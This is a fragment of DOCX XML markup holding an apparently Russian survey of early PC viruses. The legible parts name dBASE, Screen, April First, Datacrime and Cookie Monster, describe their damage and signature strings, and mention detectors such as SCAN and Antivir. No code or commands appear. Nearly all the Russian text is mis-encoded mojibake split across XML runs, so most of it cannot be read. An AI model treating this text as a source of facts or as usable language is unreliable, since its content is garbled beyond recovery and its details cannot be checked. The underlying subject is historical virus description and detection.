        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">蠥� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FAT.  �� ����⠭�������� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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짮��⥫� �����㦨����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ����� � ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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dBASE </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ���� ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樠��� 䠩� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਡ�⮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>HIDDEN,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.DAT,  � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬ �࠭���� ���ଠ�� � ⮬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(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뢠���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭�� � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) ����� ����⠢����� �����.  ��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⠫��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ঠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饣� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">DBF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮧ������ ᢮� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>BUG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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᠭ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 ���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ୠ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>BYTE � ���� �.�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ��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.Greenberg) [131].  � ���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砨 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �� �⬥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⮤� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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ࠡ�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>BUG.DAT ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ONLY.  ���⮬� �᫨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮧ���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢥��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ�⮬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 xml:space="preserve">ᬮ��� ������� � ���� ������ � ⥬ ᠬ� ���।��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">DBF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.3.  Screen Virus - "�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠪�� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१������ � ��� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>dBASE ���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⠭���� ���⮢. �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">墠�뢠�� ���뢠��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠩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 �����  ��᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮  ����� ��稭�� � ��砩��� ����樨 ��᫥����⥫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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �᫨ ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� ����  ��᫥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 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �� ����⠢��� ���⠬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���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>୮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騬 ��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>� ����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� �ணࠬ�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫���� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>। ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᤥ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१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�騥  䠩��  �  ⥪�襬  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠���� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �᫨ ��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠���� �� �⮣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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᠭ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 ���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ୠ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>BYTE � ���� �.�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ��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.Greenberg) [13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⮤� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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ᮤ�ন�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ASCII-��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ப� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">"InFeCt" (� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪨� �㪢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>। �⮩ ��ப�� �ᯮ�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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਣ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. 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⠢��� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ��� ������� ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騩 䠣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.4. ����� April First - ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>� ��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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᢥ�����  �����  ����� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>५� �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�� �६��� ࠡ��� �� �������� �������� ��⥬� � ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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PRIL 1ST HA-HA-HA YOU HAVE A VIR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 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>५� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-�-�. � ��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⮬ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ�� ��⥬� �ਢ���� � ���� ���ଠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">樨 ��  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 ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㣨� ��������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⮤� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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���� ������⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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뢠���� ����䠣��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Antivir  (�����  3.0 1988),  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ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oppenr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.5. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Datacrime  - ���⠪</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">㯯� ������ � ��� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 ����. � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६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��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��� ������ 1168 (Datacrime),  1280 (Datacrime-II) � 1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acrime-IIb).  �� �⮬ ���� ��� �⠬�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 䠩�� 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, � �⠬� Datacrime-IIb - ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">COM, ⠪ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⠤�� ������  ���  �������  ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯠�� �������� ��᫥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���� ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਪ� ��� ���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㬡�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>। ⥬ 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�  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-����� ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ⥪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� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>12 ������ � �������� ����� �������, �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�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠�� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭ ᮤ�ঠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饥�� � ��� ⥫� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����� 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CRIM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EASED: 1 MARCH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⮬ ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ���� ���� ��ᥬ� ��஦��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㫥���� 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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭨�⮦�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MBR,  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  FAT � ������ ��⠫��. ��᫥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横��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뤠��� � �⮬ ��᪮��筮� 横�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨬ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>BELL (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ᨣ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ ����ન���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१�</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ����� �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樠��� 䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᯮ�������  �  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨪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>᪠  ��� �ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮����� ��� �⮩ 楫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MIRROR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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">H.J.Highland [158], ����� �� 1990 �. �� ������ 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஬ ��ୠ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Computers &amp; Security,  ���� �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�ਭ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>᪨஢��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ������,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�騥  � ������ ��㯯� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ᥤ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쬮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨬ��� ����� ������ ࠢ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">"D", � � ��⭮��, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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㦥 㪠�뢠����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ঠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饥�� � ⥫� ����� ⥪�⮢�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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�� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>XOR. ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뤠祩 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭�� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �.�. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>। �ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���� ���᪮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 xml:space="preserve">᪥ ��ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬠ�ਢ��� ��୥��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫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 xml:space="preserve">⠫��� �������.  �᫨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-���� ⠬ �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">ᬮ�� ��᪠ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>A, � ��⥬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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⭮���� �  �����  ��  �������  ������  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-��������.  �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易�� � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠧� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">࠭���� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠧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⮣� ����� �⤥���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਮ��� � ������ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>楢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� 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 �����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭  �  ���������.  ��� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠������ �����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ࠡ�⪨ �⭮���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 ���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">࠭���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-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����.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砨 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �⬥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫��� � ��� 㦥 ��⮬ ⮣� �� �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� �� �⬥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠� ���  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ய��᪮�  �ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ��� �������⥫�� ���� �� �஢�થ �ணࠬ����� ���ᯥ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���� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥭ��� �⮣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⮤� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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���� ������⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">SCAN.  � ����⢥  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">짮���� ����䠣 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CLEAR, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�騩 � ����� ��⨢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।��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>塞�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ମ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>McAfee Associates  ��� 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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥 �⬥砫���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ����⢥ "����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" �⮣� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣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� ᮬ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.6. ����� Cookie, Cookie Monster - �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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易�� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮭ���� �����୮� �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⥫���������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SESAME STR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���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">騬 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">COM � EXE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���� �⮣� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易�� � �뤠祩 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭ 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ANT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 ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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쪮 ���� � ���������� ᫮�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COOKIE �������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>த������ ࠡ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ������ ⠩���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"OREO" ����� "��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믨��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" �����  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쪮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 �������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� �⮣� ��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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥� ��� ᫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>誮� ���⥫쭮� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>প� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥⮬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⮤� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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���� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠���� ����䠣�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Antivir (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3.0 1988), </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭�� D.Hoppenr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.7. ����� Na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 � ������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⮤� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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���� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠���� ����䠣�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Antivir (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3.0 1988), </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭�� D. Hoppenr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.8. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㣨� 䠩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⠡��� 1 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਢ����� ������� ᢥ����� � ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���������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⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">SCAN. � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮦ������ � �᫮���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
